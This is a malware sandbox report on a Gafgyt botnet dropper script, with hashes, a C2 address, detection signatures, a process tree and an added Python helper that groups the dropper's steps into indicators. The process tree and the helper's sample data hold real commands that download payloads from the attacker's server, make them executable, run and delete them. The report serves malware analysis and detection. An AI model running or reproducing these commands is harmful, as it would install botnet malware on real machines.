Analysis
max time kernel: 3s
max time network: 131s
platform: ubuntu-18.04_amd64
resource: ubuntu1804-amd64-20240611-en
resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
submitted: 03-12-2024 22:16
Static task: static1
Behavioral task: behavioral1, sample SnOoPy.sh, resource ubuntu1804-amd64-20240611-en
Behavioral task: behavioral2, sample SnOoPy.sh, resource debian9-armhf-20240611-en
Behavioral task: behavioral3, sample SnOoPy.sh, resource debian9-mipsbe-20240611-en
Behavioral task: behavioral4, sample SnOoPy.sh, resource debian9-mipsel-20240226-en
General
Target: SnOoPy.sh
Size: 2KB
MD5: 8ea1e7d08dd0cf52bbdddc3222e9b8af
SHA1: f031a227d961d83fc0083c4b5b7b4ccdfe64e711
SHA256: 2884954c3ee63cc245def342b3946b24b0aa2cbaebf7d6b2c5a8fd009760a469
SHA512: 1be9d8a04c9b95e9e07c6fad4ae90a160219b05d0bf4b77578ac7dee91b5f336688ac792aab88cc78b5923963e1c9bacf8c0407fc22119041e9def0f217800da
Malware Config
Extracted family: gafgyt
C2: 192.3.179.33:23
Signatures
Detected Gafgyt variant (1 IoC)
resource: behavioral1/files/fstream-1.dat, yara_rule: family_gafgyt
Gafgyt family
File and Directory Permissions Modification (1 TTP, 13 IoCs)
Adversaries may modify file or directory permissions to evade defenses. In this sample every hit is a chmod +x that makes a freshly downloaded payload executable immediately before the script runs it.
pid / Process: 1477 chmod, 1484 chmod, 1498 chmod, 1502 chmod, 1506 chmod, 1511 chmod, 1515 chmod, 1519 chmod, 1531 chmod, 1535 chmod, 1539 chmod, 1543 chmod, 1547 chmod
Executes dropped EXE (1 IoC)
ioc: /tmp/a-r.m-6.SNOOPY, pid: 1507, Process: a-r.m-6.SNOOPY
Writes file to tmp directory (1 IoC)
Malware often drops required files in the /tmp directory.
description: File opened for modification, ioc: /tmp/a-r.m-6.SNOOPY, Process: wget
Processes
/tmp/SnOoPy.sh  /tmp/SnOoPy.sh  PID:1475
  /usr/bin/wget  wget http://192.3.179.33/m-i.p-s.SNOOPY  PID:1476
  /bin/chmod  chmod +x m-i.p-s.SNOOPY  PID:1477  [File and Directory Permissions Modification]
  /tmp/m-i.p-s.SNOOPY  ./m-i.p-s.SNOOPY  PID:1478
  /bin/rm  rm -rf m-i.p-s.SNOOPY  PID:1479
  /usr/bin/wget  wget http://192.3.179.33/m-p.s-l.SNOOPY  PID:1480
  /bin/chmod  chmod +x m-p.s-l.SNOOPY  PID:1484  [File and Directory Permissions Modification]
  /tmp/m-p.s-l.SNOOPY  ./m-p.s-l.SNOOPY  PID:1487
  /bin/rm  rm -rf m-p.s-l.SNOOPY  PID:1488
  /usr/bin/wget  wget http://192.3.179.33/s-h.4-.SNOOPY  PID:1490
  /bin/chmod  chmod +x s-h.4-.SNOOPY  PID:1498  [File and Directory Permissions Modification]
  /tmp/s-h.4-.SNOOPY  ./s-h.4-.SNOOPY  PID:1499
  /bin/rm  rm -rf s-h.4-.SNOOPY  PID:1500
  /usr/bin/wget  wget http://192.3.179.33/x-8.6-.SNOOPY  PID:1501
  /bin/chmod  chmod +x x-8.6-.SNOOPY  PID:1502  [File and Directory Permissions Modification]
  /tmp/x-8.6-.SNOOPY  ./x-8.6-.SNOOPY  PID:1503
  /bin/rm  rm -rf x-8.6-.SNOOPY  PID:1504
  /usr/bin/wget  wget http://192.3.179.33/a-r.m-6.SNOOPY  PID:1505  [Writes file to tmp directory]
  /bin/chmod  chmod +x a-r.m-6.SNOOPY  PID:1506  [File and Directory Permissions Modification]
  /tmp/a-r.m-6.SNOOPY  ./a-r.m-6.SNOOPY  PID:1507  [Executes dropped EXE]
  /bin/rm  rm -rf a-r.m-6.SNOOPY  PID:1509
  /usr/bin/wget  wget http://192.3.179.33/x-3.2-.SNOOPY  PID:1510
  /bin/chmod  chmod +x x-3.2-.SNOOPY  PID:1511  [File and Directory Permissions Modification]
  /tmp/x-3.2-.SNOOPY  ./x-3.2-.SNOOPY  PID:1512
  /bin/rm  rm -rf x-3.2-.SNOOPY  PID:1513
  /usr/bin/wget  wget http://192.3.179.33/a-r.m-7.SNOOPY  PID:1514
  /bin/chmod  chmod +x a-r.m-7.SNOOPY  PID:1515  [File and Directory Permissions Modification]
  /tmp/a-r.m-7.SNOOPY  ./a-r.m-7.SNOOPY  PID:1516
  /bin/rm  rm -rf a-r.m-7.SNOOPY  PID:1517
  /usr/bin/wget  wget http://192.3.179.33/p-p.c-.SNOOPY  PID:1518
  /bin/chmod  chmod +x p-p.c-.SNOOPY  PID:1519  [File and Directory Permissions Modification]
  /tmp/p-p.c-.SNOOPY  ./p-p.c-.SNOOPY  PID:1520
  /bin/rm  rm -rf p-p.c-.SNOOPY  PID:1521
  /usr/bin/wget  wget http://192.3.179.33/i-5.8-6.SNOOPY  PID:1522
  /bin/chmod  chmod +x i-5.8-6.SNOOPY  PID:1531  [File and Directory Permissions Modification]
  /tmp/i-5.8-6.SNOOPY  ./i-5.8-6.SNOOPY  PID:1532
  /bin/rm  rm -rf i-5.8-6.SNOOPY  PID:1533
  /usr/bin/wget  wget http://192.3.179.33/m-6.8-k.SNOOPY  PID:1534
  /bin/chmod  chmod +x m-6.8-k.SNOOPY  PID:1535  [File and Directory Permissions Modification]
  /tmp/m-6.8-k.SNOOPY  ./m-6.8-k.SNOOPY  PID:1536
  /bin/rm  rm -rf m-6.8-k.SNOOPY  PID:1537
  /usr/bin/wget  wget http://192.3.179.33/p-p.c-.SNOOPY  PID:1538
  /bin/chmod  chmod +x p-p.c-.SNOOPY  PID:1539  [File and Directory Permissions Modification]
  /tmp/p-p.c-.SNOOPY  ./p-p.c-.SNOOPY  PID:1540
  /bin/rm  rm -rf p-p.c-.SNOOPY  PID:1541
  /usr/bin/wget  wget http://192.3.179.33/a-r.m-4.SNOOPY  PID:1542
  /bin/chmod  chmod +x a-r.m-4.SNOOPY  PID:1543  [File and Directory Permissions Modification]
  /tmp/a-r.m-4.SNOOPY  ./a-r.m-4.SNOOPY  PID:1544
  /bin/rm  rm -rf a-r.m-4.SNOOPY  PID:1545
  /usr/bin/wget  wget http://192.3.179.33/a-r.m-5.SNOOPY  PID:1546
  /bin/chmod  chmod +x a-r.m-5.SNOOPY  PID:1547  [File and Directory Permissions Modification]
  /tmp/a-r.m-5.SNOOPY  ./a-r.m-5.SNOOPY  PID:1548
  /bin/rm  rm -rf a-r.m-5.SNOOPY  PID:1549
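The process tree above is the textbook multi-architecture dropper loop: for each payload name the script runs wget, chmod +x, the payload itself, then rm -rf, so nothing stays on disk after execution. The following Python triage helper is an added example, not part of the sandbox report or of the sample. It parses a flat process list, groups the wget/chmod/execute/delete events per dropped file, and emits an IOC summary. The tab-separated input layout, the list of staging directories and the set of downloader names are assumptions of the example; the name de-obfuscation rule is inferred from the filenames in the tree, where removing the '-' and '.' padding leaves the CPU tags (mips, mpsl, sh4, x86, arm6, x32, arm7, ppc, i586, m68k, arm4, arm5) that Gafgyt- and Mirai-style droppers conventionally use, 'mpsl' being the usual shorthand for mipsel.

```python
"""Triage helper for IoT dropper scripts (added example, not report code).
Input: one process per line as pid<TAB>image<TAB>command line (assumed layout)."""
import os
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlparse

# Constructed sample: three of the chains from the report above, re-typed in
# the assumed tab-separated layout. On a live host the same rows could be
# built from execve records (auditd, eBPF) instead of a sandbox export.
SAMPLE_PROCESSES = """\
1475\t/tmp/SnOoPy.sh\t/tmp/SnOoPy.sh
1476\t/usr/bin/wget\twget http://192.3.179.33/m-i.p-s.SNOOPY
1477\t/bin/chmod\tchmod +x m-i.p-s.SNOOPY
1478\t/tmp/m-i.p-s.SNOOPY\t./m-i.p-s.SNOOPY
1479\t/bin/rm\trm -rf m-i.p-s.SNOOPY
1505\t/usr/bin/wget\twget http://192.3.179.33/a-r.m-6.SNOOPY
1506\t/bin/chmod\tchmod +x a-r.m-6.SNOOPY
1507\t/tmp/a-r.m-6.SNOOPY\t./a-r.m-6.SNOOPY
1509\t/bin/rm\trm -rf a-r.m-6.SNOOPY
1518\t/usr/bin/wget\twget http://192.3.179.33/p-p.c-.SNOOPY
1519\t/bin/chmod\tchmod +x p-p.c-.SNOOPY
1520\t/tmp/p-p.c-.SNOOPY\t./p-p.c-.SNOOPY
1521\t/bin/rm\trm -rf p-p.c-.SNOOPY
"""

STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")   # assumed staging locations
DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}     # assumed fetch tools
REQUIRED_STAGES = {"download", "chmod", "execute", "delete"}
LINE_RE = re.compile(r"^(\d+)\t(\S+)\t(.*)$")


@dataclass
class DropChain:
    filename: str
    url: Optional[str] = None
    stages: List[str] = field(default_factory=list)  # in observed order
    pids: List[int] = field(default_factory=list)

    @property
    def complete(self) -> bool:
        # Full fetch -> chmod +x -> run -> delete cycle seen for this file.
        return REQUIRED_STAGES <= set(self.stages)


def parse_processes(text: str) -> List[Tuple[int, str, str]]:
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            rows.append((int(m.group(1)), m.group(2), m.group(3)))
    return rows


def classify(image: str, cmdline: str) -> Optional[Tuple[str, str, Optional[str]]]:
    """Map one process to (stage, dropped filename, url or None)."""
    argv = cmdline.split()
    if not argv:
        return None
    prog = os.path.basename(argv[0])
    if prog in DOWNLOADERS:
        url = next((a for a in argv[1:] if "://" in a), None)
        if url:
            return ("download", os.path.basename(urlparse(url).path), url)
    if prog == "chmod" and len(argv) >= 3:
        return ("chmod", os.path.basename(argv[-1]), None)
    if prog == "rm" and len(argv) >= 2:
        return ("delete", os.path.basename(argv[-1]), None)
    if image.startswith(STAGING_DIRS):       # anything run out of a staging dir
        return ("execute", os.path.basename(image), None)
    return None


def build_chains(rows: List[Tuple[int, str, str]]) -> Dict[str, DropChain]:
    chains: Dict[str, DropChain] = {}
    for pid, image, cmdline in rows:
        hit = classify(image, cmdline)
        if hit is None:
            continue
        stage, fname, url = hit
        chain = chains.setdefault(fname, DropChain(fname))
        chain.stages.append(stage)
        chain.pids.append(pid)
        if url:
            chain.url = url
    return chains


def deobfuscate_arch(filename: str) -> str:
    """Payload names are CPU tags padded with '-' and '.' plus a campaign
    suffix: 'a-r.m-6.SNOOPY' -> 'arm6', 'm-p.s-l.SNOOPY' -> 'mpsl'."""
    stem = filename.rsplit(".", 1)[0] if "." in filename else filename
    return re.sub(r"[-.]", "", stem).lower()


def iocs(chains: Dict[str, DropChain]) -> dict:
    fetched = [c for c in chains.values() if c.url]
    return {
        "hosts": sorted({urlparse(c.url).hostname for c in fetched}),
        "urls": sorted(c.url for c in fetched),
        "arch_by_file": {c.filename: deobfuscate_arch(c.filename) for c in fetched},
        "complete_chains": [c.filename for c in fetched if c.complete],
    }


if __name__ == "__main__":
    for key, value in iocs(build_chains(parse_processes(SAMPLE_PROCESSES))).items():
        print(f"{key}: {value}")
```

A chain whose `complete` flag is set is the detection signal worth alerting on: a file fetched into a staging directory, made executable, run, and removed in quick succession leaves no artifact for a later disk scan, which is exactly why the sandbox's "Writes file to tmp directory" and "Executes dropped EXE" hits on a-r.m-6.SNOOPY matter more than the single chmod events. Note that in this run only that one payload was actually written and executed; the other chains fired the same commands but the sandbox recorded no file for them.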
Network
MITRE ATT&CK Enterprise v15: File and Directory Permissions Modification (T1222)
Downloads
Filesize: 108KB
MD5: d99e614a76b1b6b63030556a22cf2881
SHA1: 1cc0cc981f07d648722bc0b112da2d697858558f
SHA256: 6bcf634cf08615de9c4f5759bcc2523b114db64a67ed3c119c7aa4230be0b0b5
SHA512: 19585dae9db8f913f809da6644127b064b03ec2156fe482b87feb803c8facb291da0b951336c7bc13cef6af1a032229f8f18511b09531a2ad3dce4f53bb8051f